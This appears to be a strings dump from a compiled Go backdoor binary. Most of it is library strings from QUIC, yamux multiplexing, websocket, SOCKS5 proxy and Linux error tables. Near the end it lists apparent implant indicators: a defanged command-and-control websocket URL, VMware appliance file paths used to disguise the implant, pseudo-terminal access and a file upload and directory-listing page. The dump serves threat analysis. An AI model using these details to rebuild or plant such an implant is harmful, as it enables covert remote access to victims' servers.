&amp;wire.MaxDataFrame{MaximumData: %d}&#39;<br>t%s &amp;wire.MaxStreamDataFrame{StreamID: %d, MaximumStreamData: %d}&#39;<br>t%s &amp;wire.DataBlockedFrame{MaximumData: %d}&#39;<br>t%s &amp;wire.StreamDataBlockedFrame{StreamID: %d, MaximumStreamData: %d}&#39;<br>t%s &amp;wire.MaxStreamsFrame{Type: uni, MaxStreamNum: %d}&#39;<br>t%s &amp;wire.MaxStreamsFrame{Type: bidi, MaxStreamNum: %d}&quot;<br>t%s &amp;wire.StreamsBlockedFrame{Type: uni, MaxStreams: %d}&#39;<br>t%s &amp;wire.StreamsBlockedFrame{Type: bidi, MaxStreams: %d}&#39;<br>t%s &amp;wire.NewTokenFrame{Token: %#x}&#39;<br>%d exceeds the maximum stream count&quot;<br>Retire Prior To value (%d) larger than Sequence Number (%d)&#39;<br>invalid connection ID length: %d&#39;<br>invalid connection ID length: %d&#39;<br>token must not be empty&#39;<br>wire.PutStreamFrame called with packet of wrong size!&quot;<br>stream data overflows maximum offset&#39;<br>StreamFrame: attempting to write empty frame without FIN&#39;<br>%d exceeds the maximum stream count&quot;<br>remaining length (%d) smaller than parameter length (%d)&#39;<br>client sent a preferred_address&quot;<br>wrong length for disable_active_migration: %d (expected empty)&quot;<br>client sent a stateless_reset_token&#39;<br>wrong length for stateless_reset_token: %d (expected 16)&quot;<br>client sent an original_destination_connection_id&quot;<br>client sent a retry_source_connection_id&#39;<br>missing original_destination_connection_id&#39;<br>missing initial_source_connection_id&#39;<br>received duplicate transport parameter %#x&#39;<br>invalid connection ID length: %d&quot;<br>expected preferred_address to be %d long, read %d bytes&#39;<br>inconsistent transport parameter length for transport parameter %#x&#39;<br>initial_max_streams_bidi too large: %d (maximum %d)&#39;<br>initial_max_streams_uni too large: %d (maximum %d)&quot;<br>invalid value for max_packet_size: %d (minimum 1200)&#39;<br>invalid value for ack_delay_exponent: %d (maximum %d)&#39;<br>invalid value for max_ack_delay: %dms (maximum %dms)&#39;<br>TransportParameter BUG: transport parameter %d not found&#39;<br>unknown transport parameter marshaling version: %d&#39;<br>RetrySourceConnectionID: %s, &#39;<br>Version Negotiation packet has empty version list&#39;<br>Version Negotiation packet has a version list with an invalid length&quot;<br>operation not permitted&quot;<br>no such process&#39;<br>interrupted system call&#39;<br>input/output error&#39;<br>argument list too long&#39;<br>exec format error&#39;<br>bad file descriptor&#39;<br>no child processes&#39;<br>resource temporarily unavailable&quot;<br>cannot allocate memory&quot;<br>permission denied&#39;<br>bad address&#39;<br>block device required&#39;<br>device or resource busy&#39;<br>file exists&#39;<br>no such device&#39;<br>not a directory&#39;<br>is a directory&#39;<br>too many open files in system&#39;<br>too many open files&#39;<br>inappropriate ioctl for device&quot;<br>text file busy&#39;<br>file too large&#39;<br>no space left on device&#39;<br>illegal seek&#39;<br>read-only file system&#39;<br>too many links&#39;<br>broken pipe&#39;<br>numerical argument out of domain&#39;<br>numerical result out of range&#39;<br>file name too long&quot;<br>no locks available&quot;<br>function not implemented&#39;<br>ENOTEMPTY&#39;<br>directory not empty&#39;<br>too many levels of symbolic links&#39;<br>identifier removed&#39;<br>channel number out of range&#39;<br>level 3 halted&#39;<br>level 3 reset&quot;<br>link number out of range&quot;<br>protocol driver not attached&quot;<br>level 2 halted&#39;<br>exchange full&#39;<br>invalid request code&quot;<br>invalid slot&#39;<br>bad font file format&#39;<br>device not a stream&quot;<br>no data available&#39;<br>timer expired&#39;<br>out of streams resources&#39;<br>machine is not on the network&#39;<br>package not installed&#39;<br>link has been severed&quot;<br>advertise error&#39;<br>srmount error&#39;<br>communication error on send&quot;<br>protocol error&#39;<br>EMULTIHOP&#39;<br>multihop attempted&#39;<br>RFS specific error&#39;<br>bad message&#39;<br>EOVERFLOW&quot;<br>value too large for defined data type&#39;<br>file descriptor in bad state&#39;<br>remote address changed&quot;<br>can not access a needed shared library&#39;<br>accessing a corrupted shared library&#39;<br>.lib section in a.out corrupted&#39;<br>invalid or incomplete multibyte or wide character&#39;<br>interrupted system call should be restarted&#39;<br>too many users&#39;<br>EDESTADDRREQ&#39;<br>destination address required&#39;<br>protocol wrong type for socket&quot;<br>ENOPROTOOPT&#39;<br>protocol not available&#39;<br>EPROTONOSUPPORT&#39;<br>protocol not supported&#39;<br>ESOCKTNOSUPPORT&#39;<br>operation not supported&#39;<br>EPFNOSUPPORT&#39;<br>protocol family not supported&#39;<br>EAFNOSUPPORT&#39;<br>address family not supported by protocol&#39;<br>EADDRINUSE&#39;<br>address already in use&#39;<br>EADDRNOTAVAIL&quot;<br>cannot assign requested address&#39;<br>ENETUNREACH&#39;<br>network is unreachable&#39;<br>ENETRESET&#39;<br>network dropped connection on reset&#39;<br>ECONNABORTED&quot;<br>software caused connection abort&#39;<br>ECONNRESET&#39;<br>connection reset by peer&quot;<br>transport endpoint is already connected&#39;<br>ESHUTDOWN&quot;<br>cannot send after transport endpoint shutdown&#39;<br>ETOOMANYREFS&#39;<br>too many references: cannot splice&#39;<br>ETIMEDOUT&#39;<br>connection timed out&#39;<br>ECONNREFUSED&quot;<br>connection refused&#39;<br>EHOSTDOWN&quot;<br>host is down&#39;<br>EHOSTUNREACH&#39;<br>EINPROGRESS&#39;<br>stale file handle&#39;<br>structure needs cleaning&#39;<br>not a XENIX named type file&#39;<br>no XENIX semaphores available&#39;<br>is a named type file&#39;<br>EREMOTEIO&#39;<br>disk quota exceeded&#39;<br>ENOMEDIUM&#39;<br>no medium found&#39;<br>EMEDIUMTYPE&#39;<br>wrong medium type&#39;<br>ECANCELED&#39;<br>operation canceled&#39;<br>key has expired&#39;<br>EKEYREVOKED&#39;<br>key has been revoked&#39;<br>EKEYREJECTED&#39;<br>key was rejected by service&#39;<br>EOWNERDEAD&#39;<br>owner died&#39;<br>ENOTRECOVERABLE&#39;<br>state not recoverable&#39;<br>operation not possible due to RF-kill&quot;<br>EHWPOISON&#39;<br>memory page has hardware error&#39;<br>interrupt&#39;<br>illegal instruction&#39;<br>trace/breakpoint trap&#39;<br>bus error&#39;<br>floating point exception&#39;<br>user defined signal 1&#39;<br>segmentation fault&quot;<br>user defined signal 2&#39;<br>broken pipe&#39;<br>alarm clock&#39;<br>terminated&#39;<br>SIGSTKFLT&#39;<br>stack fault&#39;<br>child exited&quot;<br>continued&#39;<br>stopped (tty input)&#39;<br>stopped (tty output)&#39;<br>urgent I/O condition&#39;<br>CPU time limit exceeded&#39;<br>file size limit exceeded&quot;<br>SIGVTALRM&#39;<br>virtual timer expired&#39;<br>profiling timer expired&#39;<br>I/O possible&#39;<br>power failure&quot;<br>bad system call&#39;<br>not implemented on &#39;<br>unknown connection type&#39;<br>short message&#39;<br>invalid address&#39;<br>short address&#39;<br>short address&#39;<br>destination unreachable&#39;<br>packet too big&quot;<br>time exceeded&#39;<br>parameter problem&#39;<br>echo request&#39;<br>echo reply&#39;<br>multicast listener query&#39;<br>router solicitation&#39;<br>router advertisement&#39;<br>neighbor solicitation&#39;<br>neighbor advertisement&#39;<br>icmp node information query&#39;<br>icmp node information response&#39;<br>home agent address discovery request message&#39;<br>home agent address discovery reply message&quot;<br>certification path solicitation message&#39;<br>certification path advertisement message&#39;<br>multicast router advertisement&quot;<br>multicast router solicitation&#39;<br>multicast router termination&#39;<br>fmipv6 messages&#39;<br>rpl control message&quot;<br>ilnpv6 locator update message&#39;<br>mpl control message&#39;<br>extended echo request&#39;<br>extended echo reply&#39;<br>invalid connection&#39;<br>missing address&#39;<br>not implemented on &#39;<br>echo reply&#39;<br>destination unreachable&#39;<br>router advertisement&#39;<br>router solicitation&#39;<br>time exceeded&#39;<br>parameter problem&#39;<br>timestamp&#39;<br>timestamp reply&#39;<br>extended echo reply&#39;<br>invalid connection&#39;<br>missing address&#39;<br>nil header&#39;<br>not implemented on &quot;<br>congestion BUG: decreased max datagram size from %d to %d&#39;<br>received packet with unknown encryption level: %s&#39;<br>Cannot drop keys for encryption level %s&#39;<br>unexpected encryption level&#39;<br>tIgnoring all packets below %d.&#39;<br>tQueueing ACK because the first packet should be acknowledged.&#39;<br>tQueueing ACK because packet %d was missing before.&quot;<br>tSetting ACK timer to max ack delay: %s&#39;<br>tQueuing ACK because there&#39;s a new missing packet to report.&quot;<br>Sending ACK because the ACK timer expired.&#39;<br>pto (Initial)&#39;<br>pto (Handshake)&#39;<br>pto (Application Data)&#39;<br>invalid send mode: %d&#39;<br>negative bytes_in_flight&#39;<br>Cannot drop keys for encryption level %s&#39;<br>invalid packet number space&#39;<br>Peer doesn&#39;t await address validation any longer.&quot;<br>received an ACK for skipped packet number: %d (%s)&#39;<br>tnewly acked packets (%d): %d&#39;<br>Canceling loss detection timer. Amplification limited.&#39;<br>Canceling loss detection timer. No packets in flight.&#39;<br>tlost packet %d (reordering threshold)&quot;<br>tsetting loss timer for packet %d (%s) to %s (in %s)&#39;<br>Loss detection alarm fired in loss timer mode. Loss time: %s&#39;<br>Loss detection alarm for %s fired in PTO mode. PTO count: %d&#39;<br>PTO timer in unexpected encryption level: %s&quot;<br>Amplification window limited. Received %d bytes, already sent out %d bytes&#39;<br>Limited by the number of tracked packets: tracking %d packets, maximum %d&#39;<br>Congestion limited: bytes in flight %d, window %d&quot;<br>Max outstanding limited: tracking %d packets, maximum: %d&#39;<br>no frames&#39;<br>packet %d not found in sent packet history&#39;<br>CryptoSetup: keys at this encryption level not yet available&#39;<br>CryptoSetup: keys were already dropped&#39;<br>decryption failed&#39;<br>ClientHello&#39;<br>ServerHello&#39;<br>Certificate&#39;<br>CertificateRequest&#39;<br>CertificateVerify&#39;<br>Received %s message (%d bytes, encryption level: %s)&quot;<br>missing quic_transport_parameters extension&quot;<br>unexpected handshake message: %d&#39;<br>expected handshake message %s to have encryption level %s, has %s&quot;<br>Restoring of transport parameters from session ticket failed: %s&#39;<br>mismatching version. Got %d, expected %d&quot;<br>Unmarshalling transport parameters from session ticket failed: %s&#39;<br>Accepting 0-RTT. Restoring RTT from session ticket: %s&quot;<br>error while handling the handshake message&#39;<br>error while handling the handshake message&quot;<br>Received 0-RTT read key for the client&#39;<br>Installed 0-RTT Read keys (using %s)&#39;<br>Installed Handshake Read keys (using %s)&#39;<br>Installed 1-RTT Read keys (using %s)&#39;<br>unexpected read encryption level&#39;<br>Received 0-RTT write key for the server&#39;<br>Installed 0-RTT Write keys (using %s)&quot;<br>Installed Handshake Write keys (using %s)&#39;<br>Installed 1-RTT Write keys (using %s)&quot;<br>Dropping 0-RTT keys.&#39;<br>unexpected write encryption level&#39;<br>Doing 0-RTT.&#39;<br>Dropping Initial keys.&#39;<br>Dropping Handshake keys.&#39;<br>Dropping 0-RTT keys.&#39;<br>Invalid cipher suite id: %d&quot;<br>error creating new AES cipher: %s&quot;<br>invalid sample size&#39;<br>invalid sample size&#39;<br>quic: HKDF-Expand-Label invocation failed unexpectedly&#39;<br>client in&#39;<br>server in&quot;<br>unexpected Retry integrity tag length: %d&quot;<br>failed to read session ticket revision&#39;<br>unknown session ticket revision: %d&quot;<br>failed to read RTT&#39;<br>unmarshaling transport parameters from session ticket failed: %s&quot;<br>rest when unpacking token: %d&quot;<br>token too short: %d&quot;<br>quic-go token source&#39;<br>Dropping key phase %d ahead of scheduled time. Drop time was: %s&#39;<br>Starting key drop timer to drop key phase %d (in %s)&#39;<br>unknown cipher suite %d&quot;<br>Dropping key phase %d&#39;<br>keys updated too quickly&#39;<br>Peer updated keys to %d&#39;<br>Peer confirmed key update to phase %d&#39;<br>received ACK for key phase %d, but peer didn&#39;t update keys&quot;<br>Initiating key update to key phase %d&#39;<br>received %d bytes for the connection, allowed %d bytes&#39;<br>Increasing receive flow control window for the connection to %d kB&#39;<br>flow controller reset after reading data&#39;<br>received inconsistent final offset for stream %d (old: %d, new: %d bytes)&#39;<br>Increasing receive flow control window for stream %d to %d kB&#39;<br>duplicate stream data&#39;<br>0-RTT rejected&#39;<br>too many open streams&#39;<br>negative packetBuffer refCount&quot;<br>packetBuffer refCount not zero&#39;<br>putPacketBuffer called with packet of wrong size!&#39;<br>Received %d packets after sending CONNECTION_CLOSE. Retransmitting.&quot;<br>Error retransmitting CONNECTION_CLOSE: %s&#39;<br>invalid value for Config.MaxIncomingStreams&#39;<br>retired connection ID %d (highest issued: %d)&#39;<br>received conflicting connection IDs for sequence number %d&#39;<br>received conflicting stateless reset tokens for sequence number %d&#39;<br>expected first connection ID to have sequence number 0&#39;<br>expected first connection ID to have sequence number 0&#39;<br>Activating reading of ECN bits for IPv4 and IPv6.&#39;<br>Activating reading of ECN bits for IPv4.&#39;<br>Activating reading of ECN bits for IPv6.&quot;<br>activating ECN failed for both IPv4 and IPv6&#39;<br>Activating reading of packet info for IPv4 and IPv6.&#39;<br>activating packet info failed for both IPv4 and IPv6&#39;<br>received invalid offset %d on crypto stream, maximum allowed %d&#39;<br>received crypto data after change of encryption level&#39;<br>encryption level changed, but crypto stream has more data to read&quot;<br>received CRYPTO frame with unexpected encryption level: %s&#39;<br>Discarding DATAGRAM frame (%d bytes payload)&#39;<br>stream %d canceled with error code %d&#39;<br>too many gaps in received data&#39;<br>no gap found&#39;<br>no gap found&quot;<br>frame sorter BUG: read position higher than a gap&#39;<br>cannot use different stateless reset keys on the same packet conn&#39;<br>cannot use different tracers on the same packet conn&#39;<br>failed to determine receive buffer size: %w&#39;<br>Conn has receive buffer of %d kiB (wanted: at least %d kiB)&#39;<br>failed to increase receive buffer size: %w&#39;<br>failed to determine receive buffer size: %w&#39;<br>failed to increase receive buffer size (wanted: %d kiB, got %d kiB)&#39;<br>Increased receive buffer size to %d kiB&#39;<br>Not adding connection ID %s, as it already exists.&quot;<br>Adding connection ID %s.&#39;<br>Not adding connection ID %s for a new session, as it already exists.&quot;<br>Adding connection IDs %s and %s for a new session.&#39;<br>Removing connection ID %s after it has been retired.&#39;<br>Replacing session for connection ID %s with a closed session.&quot;<br>Removing connection ID %s for a closed session after it has been retired.&#39;<br>Temporary error reading from conn: %w&#39;<br>error parsing connection ID on packet from %s: %s&quot;<br>received a packet with an unexpected connection ID %s&#39;<br>Received a stateless reset with token %#x. Closing session.&#39;<br>Sending stateless reset to %s (connection ID: %s). Token: %#x&#39;<br>Error sending Stateless Reset: %s&#39;<br>an\&#39;t determine encryption level&#39;<br>unknown encryption level&#39;<br>unexpected encryption level: %s&#39;<br>PacketPacker BUG: packet too large (%d bytes, allowed %d bytes)&#39;<br>packetPacker BUG: Peeked and Popped packet numbers do not match&#39;<br>unknown packet type: %s&#39;<br>Packet too small. Expected at least 20 bytes after the header, got %d&#39;<br>BUG: readPosInFrame (%d) &gt; frame.DataLen (%d) in stream.Read&quot;<br>Read on stream %d canceled with error code %d&#39;<br>STREAM frames are handled with their respective streams.&#39;<br>unexpected encryption level: %s&#39;<br>sendQueue.Send would have blocked&#39;<br>numOutStandingFrames negative&#39;<br>close called for canceled stream %d&#39;<br>%s is not a valid QUIC version&#39;<br>Listening for %s connections on %s&quot;<br>server closed&#39;<br>Dropping packet from %s (%d bytes). Server receive queue full.&#39;<br>Dropping Version Negotiation packet.&#39;<br>Error parsing packet: %s&#39;<br>misrouted packet: %#v&#39;<br>Dropping a packet that is too small to be a valid Initial (%d bytes)&quot;<br>Dropping long header packet of type %s (%d bytes)&#39;<br>&lt;- Received Initial packet.&#39;<br>Error occurred handling initial packet: %s&#39;<br>too short connection ID&#39;<br>Error sending INVALID_TOKEN error: %s&#39;<br>Error sending Retry: %s&quot;<br>Error rejecting connection: %s&#39;<br>Changing connection ID to %s.&#39;<br>Changing connection ID to %s.&#39;<br>Client sent an invalid retry token. Sending INVALID_TOKEN to %s.&#39;<br>Client offered version %s, sending Version Negotiation&#39;<br>Error composing Version Negotiation: %s&#39;<br>Error sending Version Negotiation: %s&#39;<br>closing session in order to recreate it&quot;<br>Sending a keep-alive PING to keep the connection alive.&#39;<br>Connection %s closed.&#39;<br>error parsing packet: %s&#39;<br>Dropping packet with version %x. Expected %x.&#39;<br>coalesced packet has different destination connection ID: %s, expected %s&#39;<br>Parsed a coalesced packet. Part %d: %d bytes. Remaining: %d bytes.&quot;<br>Dropping %s packet (%d bytes) because we already dropped the keys.&#39;<br>Dropping %s packet (%d bytes) that could not be unpacked. Error: %s&quot;<br>&lt;- Reading packet %d (%d bytes) for connection %s, %s&quot;<br>Dropping (potentially) duplicate packet.&#39;<br>Ignoring Retry.&#39;<br>Ignoring Retry, since we already received a packet.&#39;<br>Ignoring Retry, since a Retry was already received.&#39;<br>gnoring spoofed Retry. Integrity Tag doesn\&#39;t match.&#39;<br>&lt;- Received Retry:&#39;<br>Switching destination connection ID to: %s&#39;<br>Error parsing Version Negotiation packet: %s&#39;<br>Received a Version Negotiation packet. Supported Versions: %s&#39;<br>No compatible QUIC version found.&#39;<br>Switching to QUIC version %s.&#39;<br>empty packet&quot;<br>Received first packet. Switching destination connection ID to: %s&#39;<br>unexpected PATH_RESPONSE frame&#39;<br>received a HANDSHAKE_DONE frame&#39;<br>DATAGRAM frame too large&quot;<br>Destroying session: %s&#39;<br>Destroying session with error: %s&#39;<br>Peer closed session with error: %s&#39;<br>Error sending CONNECTION_CLOSE: %s&#39;<br>Restoring Transport Parameters: %s&quot;<br>Processed Transport Parameters: %s&#39;<br>expected initial_source_connection_id to equal %s, is %s&#39;<br>expected original_destination_connection_id to equal %s, is %s&#39;<br>missing retry_source_connection_id&#39;<br>expected retry_source_connection_id to equal %s, is %s&quot;<br>received retry_source_connection_id, although no Retry was performed&#39;<br>session BUG: couldn&#39;t pack %s probe packet&quot;<br>session BUG: unspecified error type (msg: %s)&#39;<br>-&gt; Sending coalesced packet (%d parts, %d bytes) for connection %s&#39;<br>-&gt; Sending packet %d (%d bytes) for connection %s, %s&quot;<br>-&gt; Sending packet %d (%d bytes) for connection %s, %s&#39;<br>shouldn&#39;t queue undecryptable packets after handshake completion&quot;<br>Dropping undecryptable packet (%d bytes). Undecryptable packet queue full.&quot;<br>deadline exceeded&#39;<br>peer attempted to open receive stream %d&#39;<br>peer attempted to open send stream %d&#39;<br>tried to delete unknown incoming stream %d&#39;<br>tried to delete incoming stream %d multiple times&#39;<br>tried to delete unknown incoming stream %d&#39;<br>tried to delete incoming stream %d multiple times&#39;<br>peer attempted to open stream %d&#39;<br>tried to delete unknown outgoing stream %d&#39;<br>peer attempted to open stream %d&#39;<br>tried to delete unknown outgoing stream %d&#39;<br>RSA PRIVATE KEY&#39;<br>CERTIFICATE&#39;<br>1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ&#39;<br>127.0.0.1:0&#39;<br>127.0.0.2:0&#39;<br>conn closed&#39;<br>conn closed&quot;<br>endpoint i/o timeout&#39;<br>UpdateConnState&quot;<br>implement me&#39;<br>6ba7b810-9dad-11d1-80b4-00c04fd430c8&#39;<br>6ba7b811-9dad-11d1-80b4-00c04fd430c8&quot;<br>6ba7b812-9dad-11d1-80b4-00c04fd430c8&#39;<br>6ba7b814-9dad-11d1-80b4-00c04fd430c8&#39;<br>invalid UUID (got %d bytes)&#39;<br>invalid UUID length: %d&#39;<br>urn:uuid:&#39;<br>invalid urn prefix: %q&#39;<br>invalid UUID format&#39;<br>invalid UUID format&#39;<br>invalid UUID format&quot;<br>read timeout&#39;<br>write timeout&#39;<br>unreachable&#39;<br>conn closed&#39;<br>TimeDeadline&#39;<br>already closed&#39;<br>127.0.0.2:&#39;<br>127.0.0.1:&#39;<br>not found %s&#39;<br>i/o deadline reached&#39;<br>stream closed&#39;<br>unexpected flag&#39;<br>remote end is not accepting connections&#39;<br>keepalive timeout&#39;<br>backlog must be positive&#39;<br>keep-alive interval must be positive&#39;<br>MaxStreamWindowSize must be larger than %d&#39;<br>both Logger and LogOutput may not be set, select one&#39;<br>one of Logger or LogOutput must be set, select one&#39;<br>unhandled state&#39;<br>[ERR] yamux: unexpected FIN flag in state %d&#39;<br>[ERR] yamux: Failed to read stream data: %v&#39;<br>[ERR] yamux: aborted stream open without inflight syn semaphore&#39;<br>[ERR] yamux: aborted stream open (destination=%s): %v&#39;<br>[ERR] yamux: keepalive failed: %v&#39;<br>[ERR] yamux: Failed to write header: %v&#39;<br>reset by peer&#39;<br>[ERR] yamux: Failed to read header: %v&quot;<br>[ERR] yamux: Invalid protocol version: %d&quot;<br>[WARN] yamux: Discarding data for stream: %d&#39;<br>[ERR] yamux: Failed to discard data: %v&#39;<br>[WARN] yamux: frame for missing stream: %v&#39;<br>[WARN] yamux: failed to send go away: %v&#39;<br>[WARN] yamux: failed to send go away: %v&#39;<br>[WARN] yamux: failed to send ping reply: %v&#39;<br>[ERR] yamux: received protocol error go away&#39;<br>yamux protocol error&#39;<br>[ERR] yamux: received internal error go away&quot;<br>remote yamux internal error&#39;<br>[ERR] yamux: received unexpected go away&quot;<br>unexpected go away received&#39;<br>[ERR] yamux: duplicate stream declared&quot;<br>[WARN] yamux: failed to send go away: %v&#39;<br>[WARN] yamux: backlog exceeded, forcing connection reset&#39;<br>[ERR] yamux: SYN tracking out of sync&#39;<br>Vsn:%d Type:%d Flags:%d StreamID:%d Length:%d&#39;<br>stream id overflows, should start a new connection&quot;<br>operation would block on IO&#39;<br>unsupported protocol version&#39;<br>keep-alive interval must be positive&#39;<br>keep-alive timeout must be larger than keep-alive interval&quot;<br>max frame size must be positive&#39;<br>max frame size must not be larger than 65535&#39;<br>max receive buffer must be positive&#39;<br>max stream buffer must be positive&#39;<br>max stream buffer must not be larger than max receive buffer&#39;<br>max stream buffer cannot be larger than 2147483647&quot;<br>allocator Put() incorrect buffer size&#39;<br>both channel are nil&#39;<br>ALL_PROXY&#39;<br>all_proxy&#39;<br>connection forbidden&#39;<br>network unreachable&#39;<br>TTL expired&#39;<br>command not supported&#39;<br>websocket: close sent&quot;<br>websocket: read limit exceeded&#39;<br>websocket: write timeout&#39;<br>websocket: bad write message type&#39;<br>websocket: write closed&quot;<br>websocket: invalid control frame&#39;<br>websocket: bad handshake&#39;<br>websocket: invalid compression negotiation&#39;<br>malformed ws or wss URL&#39;<br>websocket: internal error, unexpected bytes at end of flate stream&#39;<br>proxy: unknown scheme: &#39;<br>proxy: no support for SOCKS5 proxy connections of type &#39;<br>proxy: failed to parse port number: &#39;<br>proxy: port number out of range: &#39;<br>proxy: failed to write greeting to SOCKS5 proxy at &#39;<br>proxy: failed to read greeting from SOCKS5 proxy at &#39;<br>proxy: SOCKS5 proxy at &#39;<br> has unexpected version &#39;<br>proxy: SOCKS5 proxy at &#39;<br> requires authentication&#39;<br>proxy: failed to write authentication request to SOCKS5 proxy at &#39;<br>proxy: failed to read authentication reply from SOCKS5 proxy at &#39;<br>proxy: SOCKS5 proxy at &quot;<br> rejected username/password&#39;<br>proxy: destination host name too long: &#39;<br>proxy: failed to write connect request to SOCKS5 proxy at &quot;<br>proxy: failed to read connect reply from SOCKS5 proxy at &quot;<br>unknown error&#39;<br>proxy: SOCKS5 proxy at &#39;<br> failed to connect: &#39;<br>proxy: failed to read domain length from SOCKS5 proxy at &#39;<br>proxy: got unknown address type &#39;<br> from SOCKS5 proxy at &#39;<br>proxy: failed to read address from SOCKS5 proxy at &#39;<br>Sec-Websocket-Extensions&#39;<br>websocket: close &#39;<br> (normal)&#39;<br> (going away)&#39;<br> (protocol error)&#39;<br> (unsupported data)&quot;<br> (no status)&#39;<br> (abnormal closure)&quot;<br> (invalid payload data)&#39;<br> (policy violation)&#39;<br> (message too big)&#39;<br> (mandatory extension missing)&#39;<br> (internal server error)&#39;<br> (TLS handshake error)&#39;<br>websocket: internal error, extra used in client mode&#39;<br>concurrent write to websocket connection&quot;<br>concurrent write to websocket connection&#39;<br>unexpected reserved bits 0x&#39;<br>message start before final message frame&quot;<br>continuation after final message frame&#39;<br>unknown opcode &#39;<br>incorrect mask flag&quot;<br>invalid close code&#39;<br>invalid utf8 payload in close frame&#39;<br>websocket: &quot;<br>repeated read on failed websocket connection&#39;<br>websocket: internal error, unexpected text or binary in Reader&#39;<br>websocket&#39;<br>Connection&#39;<br>Sec-WebSocket-Key&#39;<br>Sec-WebSocket-Version&#39;<br>Sec-WebSocket-Protocol&#39;<br>Connection&#39;<br>Sec-Websocket-Key&#39;<br>Sec-Websocket-Version&#39;<br>Sec-Websocket-Extensions&#39;<br>Sec-Websocket-Protocol&#39;<br>websocket: duplicate header not allowed: &quot;<br>Sec-Websocket-Protocol&quot;<br>Sec-WebSocket-Protocol&#39;<br>Sec-WebSocket-Extensions&#39;<br>permessage-deflate; server_no_context_takeover; client_no_context_takeover&quot;<br>websocket&#39;<br>Connection&#39;<br>Sec-Websocket-Accept&quot;<br>permessage-deflate&#39;<br>Proxy-Authorization&#39;<br>socks connect&#39;<br>socks bind&#39;<br>succeeded&#39;<br>general SOCKS server failure&#39;<br>connection not allowed by ruleset&#39;<br>network unreachable&#39;<br>TTL expired&#39;<br>command not supported&#39;<br>nil context&#39;<br>nil context&#39;<br>network not implemented&#39;<br>command not implemented&#39;<br>username/password authentication failed&#39;<br>unsupported authentication method &#39;<br>too many authentication methods&#39;<br>unexpected protocol version &#39;<br>no acceptable authentication methods&quot;<br>unknown address type&#39;<br>FQDN too long&#39;<br>unexpected protocol version &#39;<br>unknown error &#39;<br>non-zero reserved field&#39;<br>unknown address type &#39;<br>ALL_PROXY&#39;<br>all_proxy&#39;<br>failed to dial: %s&#39;<br>User-Agent&#39;<br>User-Agent&#39;<br>failed to dial %s:%s, Err:%s&quot;<br>method is not allowed&#39;<br>no matching route was found&#39;<br>mux: duplicated route variable %q&#39;<br>mux: path must start with a slash, got %q&#39;<br>mux: missing name or pattern in %q&#39;<br>%s(?P&lt;%s&gt;%s)&#39;<br>mux: unbalanced braces in %q&#39;<br>mux: unbalanced braces in %q&#39;<br>nil pointer to error encoder&#39;<br>/WindowsDriver/&#39;<br>invalid range: failed to overlap&quot;<br>127.0.0.1:0&quot;<br>Content-Type&#39;<br>text/html; charset=utf-8&#39;<br>ailed: %s\n&quot;<br>uploadFile&quot;<br>ailed: %s\n&#39;<br>rror: %s\n&#39;<br>re&gt;up over\n%s sha256sum: %x\n&lt;/pre&gt;&#39;<br>&lt;a style=\&#39;text-decoration: none;\&#39; href=&quot;%s/&quot;&gt;%s&lt;/a&gt;&lt;/p&gt;\n&#39;<br>Error reading directory&#39;<br>Content-Type&quot;<br>text/html; charset=utf-8&#39;<br>style=\&#39;text-decoration: none;\&#39;  href=&quot;%s&quot;&gt;&lt;h5&gt;..&lt;/h5&gt;&lt;/a&gt;\n&#39;<br>a style=&#39;text-decoration: none;&#39;&gt;&lt;h5&gt;now at: %s&lt;/h5&gt;&lt;/a&gt;\n&quot;<br>otal %d\n&#39;<br>Content-Type&#39;<br>seeker can&#39;t seek&quot;<br>Content-Type&#39;<br>Content-Range&#39;<br>bytes */%d&#39;<br>Content-Range&#39;<br>Content-Type&#39;<br>multipart/byteranges; boundary=&quot;<br>Accept-Ranges&#39;<br>If-Unmodified-Since&quot;<br>If-None-Match&#39;<br>If-Modified-Since&#39;<br>Last-Modified&#39;<br>Content-Type&quot;<br>Content-Length&#39;<br>Last-Modified&quot;<br>/index.html&#39;<br>Last-Modified&#39;<br>404 page not found&#39;<br>403 Forbidden&#39;<br>bytes %d-%d/%d&#39;<br>Content-Range&#39;<br>Content-Type&#39;<br>invalid range&quot;<br>invalid range&#39;<br>invalid range&#39;<br>invalid range&quot;<br>invalid range&#39;<br>unsupported&#39;<br>/dev/ptmx&#39;<br>/dev/pts/&#39;<br>wss://natsupport[.]net/api&#39;<br>/opt/vmware/vpostgres/current/bin/pg_update&#39;<br>/usr/sbin&#39;<br>rpclistener&#39;<br>/usr/sbin/rpclistener&#39;<br>exit status 121&quot;<br>f\xff&#39;<br>(empty)&#39;<br>%x&#39;<br>Initial&#39;<br>0&#39;<br>1&#39;<br>Server&#39;<br>Client&#39;<br>Initial&#39;<br> &#39;<br> &#39;<br> &#39;<br>cpu.&quot;<br>\n&#39;<br>on&#39;<br>\n&#39;<br>\n&#39;<br>avx512&#39;<br>avx512f&quot;<br>bmi1&#39;<br>bmi2&#39;<br>erms&#39;<br>popcnt&#39;<br>rdrand&#39;<br>rdseed&quot;<br>sse3&#39;<br>)&#39;<br>*&#39;<br>.&#39;<br>derived&#39;<br>derived&#39;<br>.&#39;<br>derived&#39;<br>derived&#39;<br>tls13 &#39;<br>: &#39;<br>-&gt;&#39;<br>, &#39;<br>t%s 